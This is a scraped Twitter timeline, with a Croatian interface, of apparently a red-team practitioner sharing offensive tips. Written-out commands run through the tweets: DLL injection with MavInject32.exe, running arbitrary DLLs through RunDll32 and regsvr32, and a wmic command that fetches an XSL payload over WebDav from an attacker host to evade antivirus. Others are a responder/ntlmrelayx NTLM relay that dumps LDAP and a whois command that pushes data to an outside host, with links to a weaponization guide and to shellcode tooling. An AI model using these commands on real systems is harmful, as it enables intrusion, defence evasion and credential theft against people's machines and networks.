Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @ditrizna
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ditrizna
-
Suggest you to take a look at this attempt to put several infosec projects together: https://medium.com/@ditrizna/red-team-use-case-of-open-source-weaponization-5b22b0e287a5 … WebDav, .NET injection, Obfuscation, C&C.. Direct shout-out to
@TheRealWover@_xpn_@_RastaMouse@cobbr_io@Arno0x0x for your awesome work, w/ many others rocking
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
dee3 proslijedio/la je Tweet
Using MavInject32.exe (Microsoft Corp Signed) to load any dll in a running process. > "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL> cc:
@Oddvarmoe@Hexacorn@mattifestation@subTee@tifkin_pic.twitter.com/9b26fP03A9
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cool research and writeup by
@DanyalDrew revealing new NTLM relay vector!https://twitter.com/DanyalDrew/status/1194377092713959424 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
dee3 proslijedio/la je Tweet
I guess everyone knows about this Lolbin: RunDll32.exe shell32.dll,Control_RunDLL c:\test\test.dll but about this one? RunDll32.exe Shell32.dll,Control_RunDLLAsUser c:\test\test.dll
#LOLBINHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
dee3 proslijedio/la je Tweet
It's official, Donut is a Python module. Install with 'pip3 install donut-shellcode' https://pypi.org/project/donut-shellcode/ …pic.twitter.com/43tJST9lj0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Some AV signatures do not work if you deliver payload using WebDav, like: wmic os get /format:"\\my.ip@SSL@443\wmic.xsl" BUT.. you need WebClient service to be running (not by default). Thanks to
@Arno0x0x blog! Enable it with from userland: pushd \\my.ip@SSL@443\fake & popdHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
dee3 proslijedio/la je Tweet
When detecting "regsvr32" execution most people focus on things like /u, /i and scrobj.dll. Interestingly, if you create a DLL that exports a function called "DllRegisterServer" you can use regsvr32 to execute it by simply running "regsvr32.exe test.dll".
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PowerShell ISE Filename parsing flaw RCE: https://seclists.org/bugtraq/2019/May/0 … Wonder if this would work with hidden files or NTFS ADS :)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Why not only SMB, but LDAP signing is important as well. Dump LDAP contents without any AD creds, but with one in same broadcast domain (reponder SMB/HTTP off): sess1> responder -I <eth> sess2> ntlmrelayx -wh test -wa 1 -t ldap://<ad> --no-da --no-acl -l /tmp/lootpic.twitter.com/wDAFdRKPFD
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
And here's how to setup your WebDav server on Kali: https://www.trustedsec.com/2018/06/how-to-set-up-a-quick-simple-webdav-server-for-remote-file-sharing/ …https://twitter.com/_RastaMouse/status/1099446163483357185 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whois -h <IP> -p <PORT> <PAYLOAD> https://twitter.com/Kevin2600/status/1102558893513687040 …
Tweet je nedostupan.Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.